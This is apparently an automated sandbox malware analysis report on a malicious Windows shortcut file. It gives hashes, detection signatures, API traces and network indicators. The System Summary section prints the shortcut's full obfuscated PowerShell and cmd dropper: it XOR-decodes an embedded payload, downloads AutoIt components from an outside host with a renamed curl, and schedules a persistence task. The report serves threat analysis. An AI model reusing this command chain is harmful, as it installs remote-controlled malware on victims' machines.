Windows Analysis Report
knfV5IVjEV.lnk

Overview

General Information

Sample name: knfV5IVjEV.lnk
(renamed file extension from none to lnk, renamed because original name is a hash value)
Original sample name: 2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Analysis ID: 1430699
MD5: 9d6c79c0b395cceb83662aa3f7ed0123
SHA1: 65f5f7d127c478522e9669200de20000edcb6cfb
SHA256: 2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Deletes itself after installation
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Obfuscated command line found
Powershell creates an autostart link
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Yara detected Obfuscated Powershell
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: knfV5IVjEV.lnk ReversingLabs: Detection: 21%
Source: knfV5IVjEV.lnk Virustotal: Detection: 29%
Source: knfV5IVjEV.lnk Joe Sandbox ML: detected
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DDCB60 _strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free, 8_2_00007FF7F1DDCB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DDF310 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 8_2_00007FF7F1DDF310
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DDF4E0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 8_2_00007FF7F1DDF4E0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DE64F0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, 8_2_00007FF7F1DE64F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DE9C9C CryptHashData, 8_2_00007FF7F1DE9C9C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DE9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 8_2_00007FF7F1DE9C20
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DE9BD0 CryptAcquireContextA,CryptCreateHash, 8_2_00007FF7F1DE9BD0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DE934C CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, 8_2_00007FF7F1DE934C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DE8F14 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 8_2_00007FF7F1DE8F14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DE6560 CryptHashData, 8_2_00007FF7F1DE6560
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DE6570 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 8_2_00007FF7F1DE6570
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E8CB60 _strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free, 12_2_00007FF700E8CB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E8F310 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 12_2_00007FF700E8F310
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E99BD0 CryptAcquireContextA,CryptCreateHash, 12_2_00007FF700E99BD0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E9934C CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, 12_2_00007FF700E9934C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E964F0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, 12_2_00007FF700E964F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E8F4E0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 12_2_00007FF700E8F4E0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E99C9C CryptHashData, 12_2_00007FF700E99C9C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E99C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 12_2_00007FF700E99C20
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E96570 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 12_2_00007FF700E96570
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E96560 CryptHashData, 12_2_00007FF700E96560
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E98F14 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 12_2_00007FF700E98F14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: -----BEGIN PUBLIC KEY----- 8_2_00007FF7F1DBD6F4
Source: GSlLzFnTov.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: unknown HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: on.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: curl.pdb source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr
Source: Binary string: .pdb8; source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DB20E0 malloc,recv,send,WSAGetLastError, 8_2_00007FF7F1DB20E0
Source: global traffic HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: */*
Source: GSlLzFnTov.exe String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe.1.dr String found in binary or memory: Usage: curl [options...] <url>
Source: unknown DNS traffic detected: queries for: jethropc.com
Source: powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1332486385.000002630F825000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: GSlLzFnTov.exe String found in binary or memory: https://curl.se/
Source: GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr String found in binary or memory: https://curl.se/P
Source: GSlLzFnTov.exe String found in binary or memory: https://curl.se/docs/copyright.html
Source: GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr String found in binary or memory: https://curl.se/docs/hsts.html
Source: GSlLzFnTov.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: GSlLzFnTov.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: GSlLzFnTov.exe String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: GSlLzFnTov.exe.1.dr String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1332789256.0000026312AE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=
Source: knfV5IVjEV.lnk String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago
Source: GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481469904.000001C4E455D000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0%
Source: GSlLzFnTov.exe, 00000008.00000003.1414842290.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com
Source: GSlLzFnTov.exe, 00000008.00000003.1414909781.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com##
Source: GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0rz
Source: GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0wz
Source: GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: GSlLzFnTov.exe, 00000009.00000002.1438709537.000002AD152F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Pu_
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1T
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1e
Source: GSlLzFnTov.exe, 00000009.00000003.1435646730.000002AD15329000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.com##O
Source: GSlLzFnTov.exe, 00000009.00000003.1435462912.000002AD15329000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.comqu
Source: GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1ji2
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1y
Source: powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713

System Summary

Source: knfV5IVjEV.lnk, type: SAMPLE Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: amsi64_7732.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Initial file Strings: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago
Source: unknown Process created: Commandline size = 2948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 2948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 2948
Source: knfV5IVjEV.lnk LNK file: /c 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||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E72C88 12_2_00007FF700E72C88
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E50C74 12_2_00007FF700E50C74
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E5F458 12_2_00007FF700E5F458
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E4C571 12_2_00007FF700E4C571
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E4C55E 12_2_00007FF700E4C55E
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E4C54B 12_2_00007FF700E4C54B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E4C538 12_2_00007FF700E4C538
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E94D1C 12_2_00007FF700E94D1C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E4DEA0 12_2_00007FF700E4DEA0
